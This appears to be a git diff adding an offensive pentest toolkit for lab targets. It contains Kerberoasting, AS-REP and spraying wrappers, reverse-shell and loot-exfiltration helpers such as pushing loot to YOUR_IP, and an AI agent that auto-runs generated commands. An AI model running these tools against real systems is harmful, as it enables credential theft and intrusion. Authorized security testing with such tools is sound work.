- Post-Exploitation & Reporting — HOWTO.md#post-exploitation--reporting
- Troubleshooting — HOWTO.md#troubleshooting
Safety
- Intended for systems you have explicit permission to test. Scripts default to safe, passive checks unless you opt in to aggressive actions.

TOOLKIT.md Normal file

@@ -0,0 +1,356 @@
PentestPilot — Quick Reference
For step-by-step usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md:1. This file focuses on a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if a positional argument is omitted.
Table of Contents
- Setup — #setup
- Core Workflow — #core-workflow
- Enumeration — #enumeration-requires-target
- Automation — #automation-binautomation--see-howto-automation--orchestration-dashboard-manifest
- Web helpers — #web-helpers-binweb--see-howto-web-recon--routing
- Reverse shells — #reverse-shells-binshells
- File transfer — #file-transfer-bintransfer
- Crypto / Text — #crypto--text-bincrypto
- Privilege Escalation — #privilege-escalation-binprivesc
- Misc — #misc-binmisc
- AI — #ai-binai--see-howto-ai-integrations
- Active Directory — #active-directory-binad
- Passwords — #passwords-binpasswords
- Windows — #windows-binwindows
- Post-Exploitation — #post-exploitation-binpost
- DNS — #dns-bindns
- Scanning — #scanning-binscan
- Tunnels — #tunnels-bintunnel
- Pwn — #pwn-binpwn
- Hashes — #hashes-binhashes
- Tips — #tips
Setup
- Keep this repo in a working folder, e.g., htb/.
- Source the shell helpers from your main zshrc:
echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
- Open a new shell or run: source .zshrc.htb
Core Workflow
- settarget <ip_or_host>
- Creates targets/<target> with scans, loot, www, exploits.
- Sets OUTDIR to the target's scans directory.
- ar → auto_recon: quick scan, optional UDP, basic web enum
- webrecon → run web_recon on detected web ports
- wideweb → wide_web_recon on a list
- notesinit → scaffold notes.md in target directory
- notesattach → append scan artifacts summary to notes
Enumeration (requires TARGET)
- nq → Quick nmap: scripts + versions
- nf → Full TCP: -p- then service/version
- nu → UDP top 200
- smb → SMB enumeration (anon by default)
- snmp → SNMP enumeration (community defaults to public)
Individual scripts (bin/)
- nmap_quick.sh <target>
- nmap_full.sh <target> [--rate 5000]
- nmap_udp.sh <target> [--top 200]
- smb_enum.sh <ip> [user] [pass]
- ldap_enum.sh <ip> [user] [pass] — auto-detect baseDNs
- nfs_enum.sh <ip>
- ftp_enum.sh <ip>
- snmp_enum.sh <ip> [community]
Automation (bin/automation/) — see HOWTO: Automation & Orchestration, Dashboard, Manifest
- auto_recon.sh <target> [--no-udp]
- parse_nmap_open_ports.sh <*.gnmap>
- report_summary.py <*.gnmap ...>
- web_recon.sh <target|--url <url>>
- loot_pack.sh [dir]
- wide_web_recon.sh <hosts.txt>
- notes_init.sh <target>
- notes_attach.sh <target>
- full_pipeline.sh <domain|hosts.txt> [--resume|--force]
- manifest.py (init|set|get|addlist|show|task|taskstatus|taskreset) <target> [...]
- dashboard.py [--json]
- resume_all.py — resume full pipeline across all targets
- tech_actions.py <target> [--run] — suggest/run next steps based on httpx techs
- cleanup_scans.sh [dir] [days] [--force] — prune old scan files
- proxy_toggle.sh on|off [http://host:port]
- tmux_init.sh [session] — starter tmux layout
See also in HOWTO.md:
- Automation & Orchestration
- Dashboard (Status & Evidence)
- Manifest (State & Resume)
Examples
```
# One-click pipeline (resume-aware)
full_pipeline.sh target.htb
# Agent-driven full pipeline with auto tech actions
agent full target.htb
# Dashboard
dashboard --compact
# Resume all incomplete targets
resumeall
```
Web helpers (bin/web/) — see HOWTO: Web Recon & Routing
- dirbuster.sh <url> [wordlist] [exts] — ffuf directory fuzz
- vhost_ffuf.sh <base-url> <domain> [wordlist] — virtual hosts
- param_fuzz.sh <url-with-FUZZ> [wordlist] — parameter discovery
- lfi_tester.py <url-with-PLACEHOLDER> — basic LFI checks
- tech_detect.sh <url> — headers + tech hints
- http_headers.sh <url> — raw headers
- url_titles.py <url1> [url2 ...] — titles and codes
- crawl_words.py <url> [depth] — extract words for wordlists
- sqli_quick.sh <url> <param> — sqlmap wrapper
- backup_hunter.sh <base-url> [paths.txt] — find common backups/configs
- git_dumper.sh <base-url> [outdir] — mirror exposed .git and restore
- cors_tester.py <url> [origin] — test ACAO/ACAC
- methods.sh <url> — show allowed methods (OPTIONS)
- clone_site.sh <url> [outdir] — wget mirror
- tls_scan.sh <host:443> — openssl-based TLS info
- robots_grabber.sh <base-url> — show Disallow entries
- webdav_detect.sh <url> — OPTIONS + PROPFIND
- httpx_probe.sh <host|file>
- nuclei_quick.sh <url|file> [tags]
- gobuster_dir.sh <url> [wordlist] [exts] [threads]
- httpx_to_nuclei.sh <host|file> [--severity auto|crit|high|med|low] [--tags tags]
- httpx_tech_route.py <host|file> [--tech list] [--dry-run]
- httpx_presets.sh <profile> <host|file>
- gobuster_vhost.sh <url> [wordlist] [threads]
- wpscan_quick.sh <wordpress-url>
- jenkins_quick.sh <jenkins-url>
- sonarqube_quick.sh <sonarqube-url>
- magento_quick.sh <magento-url>
- droopescan_quick.sh <url>
- joomscan_quick.sh <joomla-url>
See also in HOWTO.md:
- Web Recon & Routing
Examples
```
# Alive → nuclei with auto severity
httpx_to_nuclei.sh hosts.txt
# Route by technology and run extras
httpx_tech_route.py urls.txt --tech wordpress,drupal --wpscan --extra
# Vhost brute and directory brute
gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50
```
Reverse shells (bin/shells/)
- revsh.py <lhost> <lport> — prints common one-liners
- listener.sh <port> — rlwrap + nc/ncat listener
- tty_upgrade.sh — quick TTY tips
Examples
```
# Listener
listener.sh 4444
# One-liners to paste on target
revsh.py YOUR_IP 4444
# Upgrade TTY
tty_upgrade.sh
```
File transfer (bin/transfer/)
- http_serve.sh [port] — simple Python HTTP server
- serve.py [port] — HTTP server with web upload (POST /upload)
- push_http.sh <file> <http://host:port/upload> — upload to serve.py
- dl_oneshots.sh <lhost> <port> <filename> — download one-liners
- smb_server.sh [share] [path] — impacket SMB server
Examples
```
# Simple HTTP
http_serve.sh 8000
# Upload server and push
serve.py 8000
push_http.sh loot.txt http://YOUR_IP:8000/upload
# SMB quick share
smb_server.sh share ./loot
```
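serve.py's upload endpoint boils down to a handler that writes the raw POST body to disk. A minimal standalone sketch of that idea (names and behavior here are illustrative, not the script's actual implementation):

```python
import http.server, os, threading

class UploadHandler(http.server.BaseHTTPRequestHandler):
    # Raw body of POST /upload is written under the server's upload_dir
    def do_POST(self):
        if self.path != '/upload':
            self.send_error(404)
            return
        length = int(self.headers.get('Content-Length', 0))
        data = self.rfile.read(length)
        dest = os.path.join(self.server.upload_dir, 'upload.bin')
        with open(dest, 'wb') as f:
            f.write(data)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'OK')

    def log_message(self, *args):
        pass  # keep output quiet

def serve_uploads(upload_dir, port=0):
    # port=0 lets the OS pick a free port; read it back via server_address
    srv = http.server.HTTPServer(('127.0.0.1', port), UploadHandler)
    srv.upload_dir = upload_dir
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv
```

Pairs with a `curl --data-binary @loot.txt http://host:port/upload` style push, which is roughly what push_http.sh wraps.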
Crypto / Text (bin/crypto/)
- encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot
- jwt_show.py <jwt> — decode header/payload (no verify)
Examples
```
encoders.py b64e 'secret'; encoders.py urle 'a b'
jwt_show.py eyJhbGciOi...
```
Privilege Escalation (bin/privesc/)
- linux_quick_enum.sh — basic local recon
- suid_scan.sh — list SUID/SGID
- caps_scan.sh — list file capabilities
Examples
```
linux_quick_enum.sh
caps_scan.sh
```
Misc (bin/misc/)
- cyclic.py create <len> | offset <needle> — pattern + offset
- port_forward.sh — wrappers for ssh -L/-R/-D
- extract_urls.py <file...>
Examples
```
cyclic.py create 4000
cyclic.py offset Aa0A
port_forward.sh -L 8080:127.0.0.1:80 user@host
extract_urls.py notes.md
```
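cyclic.py presumably generates a Metasploit-style cyclic pattern (Aa0Aa1Aa2...) and locates a crash needle's offset in it; a standalone sketch under that assumption:

```python
import itertools, string

def pattern_create(length):
    # Metasploit-style pattern: Upper/lower/digit triplets, unique for a long stretch
    out = []
    for u, l, d in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase,
                                     string.digits):
        out.append(u + l + d)
        if len(out) * 3 >= length:
            break
    return ''.join(out)[:length]

def pattern_offset(needle, length=8192):
    # Regenerate the pattern and find where the needle landed
    return pattern_create(length).find(needle)
```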
AI (bin/ai/) — see HOWTO: AI Integrations
- ask.py [-m model] [-s system] "prompt" | - (stdin)
- wordlist_from_context.py <target> [context-file|-]
- orchestrate_web.py <hosts.txt>
- review_findings.py <notes.md> [extra]
- commands_planner.py "goal" [context]
- agent_orchestrator.py <task> — multi-agent runner (web|notes|post|ad)
See also in HOWTO.md:
- AI Integrations
Examples
```
# Plan commands from a goal + context
commands_planner.py "Probe admin portals" urls.txt
# Orchestrate web for a host list
orchestrate_web.py hosts.txt
# Multi-agent runner
agent web hosts.txt
```
Active Directory (bin/ad/)
- getnpusers_wrapper.sh <domain/user:pass> <dc_ip> [userlist.txt]
- getspns_wrapper.sh <domain/user:pass> <dc_ip>
- ldap_quick_users.sh <ip> <baseDN> [user pass]
- rpc_quick.sh <host> [user pass] — rpcclient lsa/users/groups
- kerbrute_wrapper.sh <domain> <users.txt> [dc-ip]
- cme_quick.sh <host> [user pass]
Examples
```
getnpusers_wrapper.sh domain/user:pass 10.10.10.5 users.txt
getspns_wrapper.sh domain/user:pass 10.10.10.5
rpc_quick.sh $TARGET
kerbrute_wrapper.sh domain users.txt 10.10.10.5
cme_quick.sh $TARGET user pass
```
Passwords (bin/passwords/)
- mutate_words.py word1 [word2 ...] | -
- spray_http_basic.sh <url> <users.txt> <password>
- merge_dedupe.sh <file1> [file2 ...] — dedup merged lists
- wordlist_cleanup.sh <wordlist> [min] [max]
- hash_id.sh <hash> — simple guess when hashid missing
Examples
```
mutate_words.py "acme" "winter"
merge_dedupe.sh list1.txt list2.txt > merged.txt
wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt
spray_http_basic.sh http://$TARGET/protected users.txt Winter2025!
```
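The exact mutation rules of mutate_words.py are not shown here; a sketch of the usual spray-list recipe (case variants plus year and suffix appends, rules assumed):

```python
def mutate(words, years=('2024', '2025'), suffixes=('!', '123')):
    # Case variants, then year/suffix appends on each variant
    out = set()
    for w in words:
        for base in (w.lower(), w.capitalize(), w.upper()):
            out.add(base)
            for y in years:
                out.add(base + y)
            for s in suffixes:
                out.add(base + s)
    return sorted(out)
```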
Windows (bin/windows/)
- privesc_quick.ps1 — run on target
- win_share_enum.ps1 -Target <host>
- find_unquoted_services.ps1 — potential service path issues
- find_path_writable.ps1 — writable PATH dirs
- windows_loot.ps1 — targeted loot collector
Examples
```
powershell -ep bypass -f bin/windows/privesc_quick.ps1
powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET
powershell -ep bypass -f bin/windows/find_unquoted_services.ps1
```
Post-Exploitation (bin/post/)
- linux_loot.sh — targeted loot collector with size caps
- windows_loot.ps1 — targeted loot collector (PowerShell)
- pack_report.sh <target> — merge loot/scans into markdown report
Examples
```
LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh
bin/post/pack_report.sh $TARGET
```
DNS (bin/dns/)
- zone_transfer.sh <domain> [ns]
- subenum.sh <domain>
- gobuster_dns.sh <domain> [wordlist] [threads]
Examples
```
zone_transfer.sh target.htb
gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100
```
Scanning (bin/scan/)
- naabu_quick.sh <target> [flags]
- masscan_top.sh <target> [rate]
Examples
```
naabu_quick.sh $TARGET -p 1-65535
masscan_top.sh $TARGET 20000
```
Tunnels (bin/tunnel/)
- chisel_server.sh <port>
- chisel_client.sh <host:port> R:<lport>:<rhost>:<rport>
- autossh_socks.sh <user@host> [lport]
- socat_forward.sh -L|-R <lport> <rhost> <rport>
Examples
```
autossh_socks.sh user@pivot 1080
chisel_server.sh 8000 &
chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80
```
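socat_forward.sh's -L mode is a plain TCP relay; the same idea as a self-contained sketch (illustrative, not the wrapper's implementation):

```python
import socket, threading

def _pump(src, dst):
    # Copy bytes one direction until EOF, then half-close the peer
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

def forward(lport, rhost, rport):
    # Listen on lport and relay each connection to rhost:rport
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('127.0.0.1', lport))
    srv.listen(5)
    def accept_loop():
        while True:
            cli, _ = srv.accept()
            rem = socket.create_connection((rhost, rport))
            threading.Thread(target=_pump, args=(cli, rem), daemon=True).start()
            threading.Thread(target=_pump, args=(rem, cli), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv
```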
Pwn (bin/pwn/)
- pwntools_template.py — starter exploit template
Examples
```
python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337
```
Hashes (bin/hashes/)
- extract_ntlm_from_secretsdump.py <file> [out]
- john_pfx.sh <file.pfx> — john format for PFX
Examples
```
extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt
john_pfx.sh cert.pfx > pfx.hash
```
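secretsdump lines follow the well-known `user:rid:LMhash:NThash:::` layout; a sketch of pulling NT hashes out of them (the real extractor may differ):

```python
import re

# user:rid:32-hex LM:32-hex NT::: (the trailing colons mark empty fields)
LINE = re.compile(r'^(?P<user>[^:]+):(?P<rid>\d+):'
                  r'(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::')

def extract_nt(lines):
    # Returns (user, nt_hash) pairs, e.g. for hashcat -m 1000
    out = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            out.append((m.group('user'), m.group('nt').lower()))
    return out
```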
Tips
- OUTDIR controls where scans are saved; set by settarget.
- Most scripts accept TARGET via env if argument omitted.
- If a tool isn't installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
- For AI helpers, set OPENAI_API_KEY or run a local Ollama server.
- Use responsibly and only with explicit authorization.
- Dashboard flags: --no-color, --compact, --json
- Read HOWTO.md for detailed guidance and examples.
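The TARGET-via-env convention from the tips above, in isolation (`pick_target` is an illustrative name, not a toolkit script; the wrappers inline the same expansion):

```shell
# Positional argument wins, then $TARGET from the environment, else empty.
pick_target() {
  echo "${1:-${TARGET:-}}"
}
```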

bin/ad/cme_quick.sh Executable file

@@ -0,0 +1,14 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [user] [pass] (requires crackmapexec)" >&2; exit 1; }
if ! command -v crackmapexec >/dev/null 2>&1; then echo "[!] crackmapexec not found" >&2; exit 2; fi
if [[ -n "$user" ]]; then
crackmapexec smb "$host" -u "$user" -p "$pass" --shares --sessions --loggedon-users || true
else
crackmapexec smb "$host" -u '' -p '' --shares --sessions || true
fi
echo "[!] Beware of lockout policies when authenticating."

bin/ad/getnpusers_wrapper.sh Executable file

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <domain>/<user>:<pass> <dc_ip> [userlist.txt]" >&2; exit 1; }
creds=${1:-}
dc=${2:-}
userlist=${3:-}
[[ -z "$creds" || -z "$dc" ]] && usage
if ! command -v getNPUsers.py >/dev/null 2>&1; then
echo "[!] impacket not found (getNPUsers.py). Install impacket." >&2
exit 2
fi
if [[ -n "${userlist:-}" ]]; then
getNPUsers.py -no-pass -dc-ip "$dc" "$creds" -usersfile "$userlist" -format hashcat -outputfile asrep_hashes.txt
else
getNPUsers.py -no-pass -dc-ip "$dc" "$creds" -format hashcat -outputfile asrep_hashes.txt
fi
echo "[+] Saved AS-REP hashes to asrep_hashes.txt"

bin/ad/getspns_wrapper.sh Executable file

@@ -0,0 +1,17 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <domain>/<user>:<pass> <dc_ip>" >&2; exit 1; }
creds=${1:-}
dc=${2:-}
[[ -z "$creds" || -z "$dc" ]] && usage
if ! command -v GetUserSPNs.py >/dev/null 2>&1; then
echo "[!] impacket not found (GetUserSPNs.py). Install impacket." >&2
exit 2
fi
GetUserSPNs.py -dc-ip "$dc" -request "$creds" -outputfile kerberoast_hashes.txt
echo "[+] Saved Kerberoast hashes to kerberoast_hashes.txt"

bin/ad/kerbrute_wrapper.sh Executable file

@@ -0,0 +1,13 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
userlist=${2:-}
dc=${3:-}
[[ -z "$domain" || -z "$userlist" ]] && { echo "Usage: $(basename "$0") <domain> <userlist.txt> [dc-ip] (requires kerbrute)" >&2; exit 1; }
if ! command -v kerbrute >/dev/null 2>&1; then echo "[!] kerbrute not found" >&2; exit 2; fi
if [[ -n "$dc" ]]; then
exec kerbrute userenum -d "$domain" --dc "$dc" "$userlist"
else
exec kerbrute userenum -d "$domain" "$userlist"
fi

bin/ad/ldap_quick_users.sh Executable file

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
base=${2:-}
[[ -z "$ip" || -z "$base" ]] && { echo "Usage: $(basename "$0") <ip> <baseDN> [user [pass]]" >&2; exit 1; }
user=${3:-}
pass=${4:-}
args=(-H "ldap://$ip" -b "$base" -LLL)
if [[ -n "$user" ]]; then
args+=(-x -D "$user" -w "$pass")
else
args+=(-x)
fi
ldapsearch "${args[@]}" '(objectClass=person)' sAMAccountName mail userPrincipalName 2>/dev/null | awk '/^sAMAccountName:/{print $2}'

bin/ad/rpc_quick.sh Executable file

@@ -0,0 +1,21 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [user] [pass]" >&2; exit 1; }
if ! command -v rpcclient >/dev/null 2>&1; then
echo "[!] rpcclient not found" >&2; exit 2
fi
echo "[+] rpcclient enum on $host"
if [[ -n "$user" ]]; then
auth=(-U "$user%$pass")
else
auth=(-N)
fi
rpcclient "${auth[@]}" "$host" -c 'lsaquery; lookupnames Administrator; enumdomusers; enumdomgroups' || true

bin/ai/_ai_utils.py Executable file

@@ -0,0 +1,34 @@
#!/usr/bin/env python3
import os, json, requests, time
def ai_complete(prompt, system='You are a helpful pentest copilot.', temperature=0.2, max_chars=12000, retries=2, timeout=60):
text = prompt[-max_chars:] if len(prompt) > max_chars else prompt
provider = os.environ.get('PROVIDER') or ('openai' if os.environ.get('OPENAI_API_KEY') else 'ollama')
last_err = ''
for _ in range(retries):
try:
if provider == 'openai' and os.environ.get('OPENAI_API_KEY'):
url = 'https://api.openai.com/v1/chat/completions'
headers = {'Authorization': f"Bearer {os.environ['OPENAI_API_KEY']}", 'Content-Type':'application/json'}
body = {'model': os.environ.get('OPENAI_MODEL','gpt-4o-mini'),
'messages':[{'role':'system','content':system},{'role':'user','content':text}],
'temperature':temperature}
r = requests.post(url, headers=headers, data=json.dumps(body), timeout=timeout)
if r.ok:
return r.json()['choices'][0]['message']['content']
last_err = f"HTTP {r.status_code}: {r.text[:200]}"
else:
host = os.environ.get('OLLAMA_HOST', 'http://localhost:11434')
model = os.environ.get('OLLAMA_MODEL', 'llama3.1')
r = requests.post(f'{host}/api/chat', json={'model':model,'messages':[{'role':'system','content':system},{'role':'user','content':text}]}, timeout=timeout)
if r.ok:
try:
return r.json()['message']['content']
except Exception:
return r.text
last_err = f"HTTP {r.status_code}: {r.text[:200]}"
except Exception as e:
last_err = str(e)
time.sleep(1)
return f"[AI error] {last_err}"
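The provider fallback at the top of ai_complete can be exercised in isolation; the same selection rule as a standalone function (a sketch for illustration):

```python
def pick_provider(env):
    # Explicit PROVIDER wins, then OpenAI when a key is present, else local Ollama
    return env.get('PROVIDER') or ('openai' if env.get('OPENAI_API_KEY') else 'ollama')
```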

bin/ai/agent_orchestrator.py Executable file

@@ -0,0 +1,187 @@
#!/usr/bin/env python3
import os, sys, subprocess, json, shutil, time
HELP = """Usage: agent_orchestrator.py <task> [args]
Tasks:
web <hosts.txt> [--force] # httpx -> nuclei -> screenshots -> AI plan (resume-aware)
full <domain|hosts.txt> # DNS -> httpx -> nuclei -> tech route (+wpscan)
notes <target> # init notes, attach artifacts
post <target> # run loot collectors + pack report
ad <host> [--force] # basic AD recon wrappers (resume-aware)
Env: OUTDIR, HTB_ROOT, OPENAI_API_KEY/OLLAMA_HOST (optional).
"""
def run(cmd, check=False):
print(f"[*] {cmd}")
return subprocess.call(cmd, shell=True) if isinstance(cmd, str) else subprocess.call(cmd)
def run_capture(cmd):
    try:
        # shell=True is only valid for string commands; list commands must run directly
        out = subprocess.check_output(cmd, shell=isinstance(cmd, str), stderr=subprocess.STDOUT, timeout=600)
        return out.decode('utf-8', 'ignore')
    except Exception:
        return ''
def manifest_task(target, name, action, meta=None):
root = os.environ.get('HTB_ROOT')
if not target or not root:
return
cmd = ["bin/automation/manifest.py","task",target,name,action]
if meta:
cmd.append(json.dumps(meta))
run(cmd)
def manifest_status(target, name):
root = os.environ.get('HTB_ROOT')
if not target or not root:
return None
code = subprocess.call(["bin/automation/manifest.py","taskstatus",target,name])
if code == 0:
return 'ok'
elif code == 2:
return 'running'
return None
def task_web(hosts, force=False):
outdir=os.environ.get('OUTDIR','scans')
os.makedirs(outdir, exist_ok=True)
ts=time.strftime('%Y%m%d_%H%M%S')
urls=f"{outdir}/agent_urls_{ts}.txt"
target=os.environ.get('TARGET')
# Probe
if shutil.which('httpx'):
if not force and manifest_status(target, 'web_httpx') == 'ok':
print('[=] Resume: skipping web_httpx (already ok)')
else:
t0=time.time()
run(f"httpx -silent -l {hosts} -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -asn -ip -hash -server | sed 's/ .*$//' | sort -u > {urls}")
manifest_task(target, 'web_httpx', 'ok', {'urls_file': urls, 'elapsed_sec': int(time.time()-t0)})
else:
print('[!] httpx missing; using wide_web_recon.sh')
run(["bin/automation/wide_web_recon.sh", hosts])
return
# Nuclei
if shutil.which('nuclei'):
if not force and manifest_status(target, 'web_nuclei') == 'ok':
print('[=] Resume: skipping web_nuclei (already ok)')
else:
t0=time.time()
run(["bin/web/nuclei_quick.sh", urls])
manifest_task(target, 'web_nuclei', 'ok', {'elapsed_sec': int(time.time()-t0)})
# Screenshots
if shutil.which('gowitness'):
if not force and manifest_status(target, 'web_shots') == 'ok':
print('[=] Resume: skipping web_shots (already ok)')
else:
t0=time.time()
run(f"gowitness file -f {urls} -P {outdir}/gowitness_{ts}")
manifest_task(target, 'web_shots', 'ok', {'dir': f"{outdir}/gowitness_{ts}", 'elapsed_sec': int(time.time()-t0)})
# Plan via AI (optional)
if shutil.which('python3') and (os.environ.get('OPENAI_API_KEY') or os.environ.get('OLLAMA_HOST')):
if not force and manifest_status(target, 'web_plan') == 'ok':
print('[=] Resume: skipping web_plan (already ok)')
else:
t0=time.time()
plan=run_capture(["bin/ai/commands_planner.py","Web recon next steps",urls])
if plan:
path=f"{outdir}/agent_plan_{ts}.txt"
with open(path,"w") as f: f.write(plan)
print(f"[+] Plan saved: {path}")
manifest_task(target, 'web_plan', 'ok', {'plan': path, 'elapsed_sec': int(time.time()-t0)})
def task_notes(target, force=False):
if not force and manifest_status(target, 'notes_init') == 'ok':
print('[=] Resume: skipping notes_init (already ok)')
else:
t0=time.time()
run(["bin/automation/notes_init.sh", target])
manifest_task(target, 'notes_init', 'ok', {'elapsed_sec': int(time.time()-t0)})
if not force and manifest_status(target, 'notes_attach') == 'ok':
print('[=] Resume: skipping notes_attach (already ok)')
else:
t0=time.time()
run(["bin/automation/notes_attach.sh", target])
manifest_task(target, 'notes_attach', 'ok', {'elapsed_sec': int(time.time()-t0)})
def task_post(target, force=False):
# Linux loot
if not force and manifest_status(target, 'post_linux_loot') == 'ok':
print('[=] Resume: skipping post_linux_loot (already ok)')
else:
t0=time.time()
run(["bash","-lc",f"TARGET={target} bin/post/linux_loot.sh || true"])
manifest_task(target, 'post_linux_loot', 'ok', {'elapsed_sec': int(time.time()-t0)})
# Report pack
if not force and manifest_status(target, 'post_report') == 'ok':
print('[=] Resume: skipping post_report (already ok)')
else:
t0=time.time()
run(["bash","-lc",f"TARGET={target} bin/post/pack_report.sh {target}"])
manifest_task(target, 'post_report', 'ok', {'elapsed_sec': int(time.time()-t0)})
def task_ad(args, force=False):
host=args[0]
target=os.environ.get('TARGET')
if shutil.which('enum4linux-ng'):
if not force and manifest_status(target, 'ad_enum4linux') == 'ok':
print('[=] Resume: skipping ad_enum4linux (already ok)')
else:
t0=time.time()
run(["bin/smb/enum4linux_ng.sh", host])
manifest_task(target, 'ad_enum4linux', 'ok', {'elapsed_sec': int(time.time()-t0)})
if not force and manifest_status(target, 'ad_smbmap') == 'ok':
print('[=] Resume: skipping ad_smbmap (already ok)')
else:
t0=time.time()
run(["bin/smb/smbmap_quick.sh", host])
manifest_task(target, 'ad_smbmap', 'ok', {'elapsed_sec': int(time.time()-t0)})
if not force and manifest_status(target, 'ad_rpc') == 'ok':
print('[=] Resume: skipping ad_rpc (already ok)')
else:
t0=time.time()
run(["bin/ad/rpc_quick.sh", host])
manifest_task(target, 'ad_rpc', 'ok', {'elapsed_sec': int(time.time()-t0)})
def main():
if len(sys.argv) < 2:
print(HELP); sys.exit(1)
task=sys.argv[1]
args=sys.argv[2:]
if task=="web" and args:
force = ('--force' in args)
task_web(args[0], force=force)
elif task=="full" and args:
# small state-machine: run resume pipeline; if tasks not ok, try again (max 3 passes)
target = os.environ.get('TARGET')
manifest_task(target, 'full_pipeline', 'start', {'input': args[0]})
for i in range(3):
run(["bin/automation/full_pipeline.sh", args[0], "--resume"]) # idempotent
# check statuses
dns=manifest_status(target,'dns')
httpx=manifest_status(target,'httpx')
nuclei=manifest_status(target,'nuclei')
tech=manifest_status(target,'techroute')
wp=manifest_status(target,'wpscan')
if all(s=='ok' or s is None for s in [dns,httpx,nuclei,tech,wp]):
manifest_task(target, 'full_pipeline', 'ok')
# After pipeline is complete, run tech_actions to chain evidence -> action
if manifest_status(target, 'tech_actions') != 'ok':
manifest_task(target, 'tech_actions', 'start')
run(["bin/automation/tech_actions.py", target, "--run"])
manifest_task(target, 'tech_actions', 'ok')
break
else:
manifest_task(target, 'full_pipeline', 'fail', {'reason':'incomplete after retries'})
elif task=="notes" and args:
force = ('--force' in args)
task_notes(args[0], force=force)
elif task=="post" and args:
force = ('--force' in args)
task_post(args[0], force=force)
elif task=="ad" and args:
force = ('--force' in args)
task_ad(args, force=force)
else:
print(HELP); sys.exit(1)
if __name__=='__main__':
main()

bin/ai/ask.py Executable file

@@ -0,0 +1,73 @@
#!/usr/bin/env python3
import os, sys, json, requests
def usage():
print("Usage: ask.py [-m model] [-s system] [prompt | -]", file=sys.stderr)
print("Env:")
print(" PROVIDER=openai|ollama (default: openai if OPENAI_API_KEY set else ollama)")
print(" OPENAI_API_KEY, OPENAI_MODEL (default: gpt-4o-mini)")
print(" OLLAMA_HOST (default: http://localhost:11434), OLLAMA_MODEL (default: llama3.1)")
sys.exit(1)
model = None
system = os.environ.get('AI_SYSTEM', 'You are a helpful pentest copilot.')
args = sys.argv[1:]
while args and args[0].startswith('-'):
if args[0] == '-m' and len(args) > 1:
model = args[1]; args = args[2:]
elif args[0] == '-s' and len(args) > 1:
system = args[1]; args = args[2:]
else:
usage()
if not args:
usage()
prompt = args[0]
if prompt == '-':
prompt = sys.stdin.read()
provider = os.environ.get('PROVIDER')
if not provider:
provider = 'openai' if os.environ.get('OPENAI_API_KEY') else 'ollama'
if provider == 'openai':
key = os.environ.get('OPENAI_API_KEY')
if not key:
        print('[!] OPENAI_API_KEY not set; falling back to ollama', file=sys.stderr)
provider = 'ollama'
else:
model = model or os.environ.get('OPENAI_MODEL', 'gpt-4o-mini')
url = 'https://api.openai.com/v1/chat/completions'
headers = {'Authorization': f'Bearer {key}', 'Content-Type': 'application/json'}
body = {
'model': model,
'messages': [
{'role': 'system', 'content': system},
{'role': 'user', 'content': prompt}
],
'temperature': 0.2,
}
r = requests.post(url, headers=headers, data=json.dumps(body), timeout=60)
r.raise_for_status()
print(r.json()['choices'][0]['message']['content'].strip())
sys.exit(0)
# ollama
host = os.environ.get('OLLAMA_HOST', 'http://localhost:11434')
model = model or os.environ.get('OLLAMA_MODEL', 'llama3.1')
url = f'{host}/api/chat'
body = {'model': model, 'messages': [{'role': 'system', 'content': system}, {'role': 'user', 'content': prompt}]}
r = requests.post(url, json=body, timeout=60)
if r.ok:
data = r.json()
    # response carries the reply under 'message'; otherwise fall back to raw JSON
if 'message' in data and 'content' in data['message']:
print(data['message']['content'].strip())
else:
# naive fallback
print(json.dumps(data, indent=2))
else:
print(f'[!] Ollama request failed: {r.status_code}', file=sys.stderr)
sys.exit(2)

bin/ai/commands_planner.py Executable file

@@ -0,0 +1,24 @@
#!/usr/bin/env python3
import os, sys
from _ai_utils import ai_complete
def usage():
print(f"Usage: {sys.argv[0]} <goal-text> [context-file|-]", file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 2:
usage()
goal = sys.argv[1]
ctx = ''
if len(sys.argv) > 2:
arg = sys.argv[2]
if arg == '-':
ctx = sys.stdin.read()
elif os.path.isfile(arg):
ctx = open(arg,'r',errors='ignore').read()
system = 'You output only bash commands and our toolkit scripts (bin/..). No explanations.'
